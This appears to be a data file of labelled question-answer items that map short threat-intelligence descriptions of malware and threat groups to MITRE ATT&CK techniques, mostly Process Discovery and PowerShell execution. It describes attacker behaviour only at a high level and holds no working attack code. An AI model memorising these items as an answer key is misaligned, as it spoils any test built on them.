+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZIPLINE can identify running processes and their names.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy uses the tasklist and wmic process get Capture, ExecutablePath commands to gather the processes running on the system.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda checks for running processes on the victim’s machine.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zox has the ability to list processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxShell has a command, ps, to obtain a listing of processes on the system.","Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ has created a snapshot of running processes using `CreateToolhelp32Snapshot`.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: down_new has the ability to list running processes on a compromised host.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT has the capability to list processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: iKitten lists the current processes running.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: jRAT can query and kill system processes.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: macOS.OSAMiner has used `ps ax | grep | grep -v grep | ...` and `ps ax | grep -E...` to conduct process discovery.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: metaMain can enumerate the processes that run on the platform.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: njRAT can search a list of running processes for Tr.exe.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty gets an output of running processes using the tasklist command.,"Tecnique: T1057 Process Discovery, Tactic: TA0007 Discovery"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used Perl scripts to enable the deployment of the THINSPOOL shell script dropper and for enumerating host data.","Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: For Operation Spalax, the threat actors used Nullsoft Scriptable Install System (NSIS) scripts to install malware.","Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 downloaded and launched code within a SCT file.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used COM scriptlets to download Cobalt Strike beacons.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 has used Ruby scripts to execute payloads.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has utilized custom scripts to perform internal reconnaissance.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used the command line for execution.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN5 scans processes on all victim systems in the environment and uses automated scripts to pull back the results.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.","Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 used SQL scripts to help perform tasks on the victim's machine.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used a Perl reverse shell to communicate with C2.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Malware used by Ke3chang can run commands on the command-line interface.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used various types of scripting for execution.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware uses WMI to script data collection and command execution on the victim.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Whitefly has used a simple remote shell tool that will call back to the C2 server and wait for commands.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Windigo has used a Perl script for information gathering.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook can support commands to execute Java-based payloads.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bonadan can create bind and reverse shells on the infected system.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CHOPSTICK is capable of performing remote command execution.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet can execute various types of scripts on the victim’s machine.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut can generate shellcode outputs that execute via Ruby.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire uses a command-line interface to interact with systems.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIVEHANDS can receive a command line argument to limit file encryption to specified directories.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Get2 has the ability to run executables with command-line arguments.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Imminent Monitor has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kessel can create a reverse shell between the infected host and a specified system.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Matryoshka is capable of providing Meterpreter shell access.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: P.A.S. Webshell has the ability to create reverse shells with Perl scripts.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has executed a Lua script through a Lua interpreter for Windows.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLIGHTPULSE contains functionality to execute arbitrary commands passed to it.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SpeakUp uses Perl scripts.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WINERACK can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zeus Panda can launch remote scripts on the victim’s machine.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: gh0st RAT is able to open a remote shell to execute commands.,"Tecnique: T1059 Command and Scripting Interpreter, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2022 Ukraine Electric Power Attack, Sandworm Team utilized a PowerShell utility called TANKTRAP to spread and launch a wiper using Windows Group Policy.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0018, the threat actors used encoded PowerShell scripts for execution.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During C0021, the threat actors used obfuscated PowerShell to extract an encoded payload from within an .LNK file.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the C0032 campaign, TEMP.Veles used PowerShell to perform timestomping.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Frankenstein, the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Dream Job, Lazarus Group used PowerShell commands to explore the environment of compromised victims.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors used PowerShell on compromised systems.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the SolarWinds Compromise, APT29 used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and execute other commands.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: In the Triton Safety Instrumented System Attack, TEMP.Veles used a publicly available PowerShell-based tool, WMImplant.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT19 used PowerShell commands to execute payloads.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 downloads and executes PowerShell scripts and performs PowerShell commands.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has used PowerShell on victim systems to download and run payloads after exploitation.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT33 has utilized PowerShell to download files from the C2 server and run various scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has used PowerShell to execute commands and other operational tasks.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT39 has used PowerShell to execute malicious code.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 leveraged PowerShell to deploy malware families in victims’ environments.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used PowerShell to accomplish tasks within targeted environments.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Aquatic Panda has downloaded additional scripts and executed Base64 encoded commands in PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BRONZE BUTLER has used PowerShell for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has used PowerShell reverse TCP shells to issue interactive commands over a network connection.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chimera has used PowerShell scripts to execute malicious payloads and the DSInternals PowerShell module to make use of Active Directory features.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has used PowerShell to communicate with C2, download files, and execute reconnaissance commands.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has used powershell.exe to download and execute scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Confucius has used PowerShell to execute malicious files and payloads.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CopyKittens has used PowerShell Empire.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkHydrus leveraged PowerShell to download and execute additional scripts for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkVishnya used PowerShell to create shellcode loaders.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dragonfly has used PowerShell scripts for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca has used PowerShell to execute commands.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ember Bear has used PowerShell to download and execute malicious code.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN10 uses PowerShell for execution as well as PowerShell Empire to establish persistence.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN13 has used PowerShell commands to obtain DNS data from a compromised network.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN6 has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 used a PowerShell script to launch shellcode that retrieved an additional payload.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN8's malicious spearphishing payloads are executed as PowerShell. FIN8 has also used PowerShell for lateral movement and credential access.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fox Kitten has used PowerShell scripts to access credential data.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GALLIUM used PowerShell for execution to assist in lateral movement as well as for dumping credentials stored on compromised machines.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GOLD SOUTHFIELD has staged and executed PowerShell scripts on compromised hosts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gallmaker used PowerShell to download additional payloads and for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gamaredon Group has used obfuscated PowerShell scripts for staging.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HAFNIUM has used the Exchange Power Shell module Set-OabVirtualDirectoryPowerShell to export mailbox data.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HEXANE has used PowerShell-based tools and scripts for discovery and collection on compromised hosts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Inception has used PowerShell to execute malicious commands and payloads.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Indrik Spider has used PowerShell Empire for execution of malware.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has executed a variety of PowerShell scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group has used PowerShell to execute commands and malicious code.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LazyScripter has used PowerShell scripts to execute malicious code.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Leviathan has used PowerShell for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Magic Hound has used PowerShell for execution and privilege escalation.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Molerats used PowerShell implants on target machines.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoustachedBouncer has used plugins to execute PowerShell scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MuddyWater has used PowerShell for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mustang Panda has used malicious PowerShell scripts to enable execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nomadic Octopus has used PowerShell for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OilRig has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Patchwork used PowerSploit to download payloads, run a reverse shell, and execute malware on the victim's machine.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Poseidon Group's Information Gathering Tool (IGT) includes PowerShell components.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team has used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sidewinder has used PowerShell to drop and execute malware loaders.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has used PowerShell to download and execute payloads.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stealth Falcon malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has used PowerShell to download files and to inject into various Windows processes.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA459 has used PowerShell for execution of a payload.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA505 has used PowerShell to download and execute malware and reconnaissance scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has executed PowerShell commands in batch scripts.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390 has used PowerShell for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Thrip leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ToddyCat has used Powershell scripts to perform post exploit collection.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tonto Team has used PowerShell to download additional payloads.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has used PowerShell to execute commands/scripts, in some cases via a custom executable or code from Empire's PSInject. Turla has also used PowerShell scripts to load and execute malware in memory.","Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volt Typhoon has used PowerShell including for remote system discovery.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WIRTE has used PowerShell for script execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used macros to execute PowerShell scripts to download malware on victim's machines. It has also used PowerShell to execute commands and move laterally through a victim network.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: menuPass uses PowerSploit to inject shellcode into PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AADInternals is written and executed via PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Akira will execute PowerShell commands to delete system volume shadow copies.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleSeed has the ability to execute its payload via PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AutoIt backdoor downloads a PowerShell script that decodes to a typical shellcode loader.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can utilize `powershell.exe` to execute commands on a compromised host.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BONDUPDATER is written in PowerShell.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bandook has used PowerShell loaders as part of execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can execute a PowerShell script received from C2.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta has used PowerShell scripts for discovery and to execute files over the network.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BloodHound can use PowerShell to pull Active Directory information from the target environment.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can use PowerShell for execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CharmPower can use PowerShell for payload execution and C2 communication.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Clambling dropper can use PowerShell to download the malware.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can execute a payload on a remote host with PowerShell. This technique does not write any data to disk. Cobalt Strike can also use PowerSploit and other scripting frameworks to perform execution.,"Tecnique: T1059.001 Command and Scripting Interpreter: PowerShell, Tactic: TA0002 Execution"
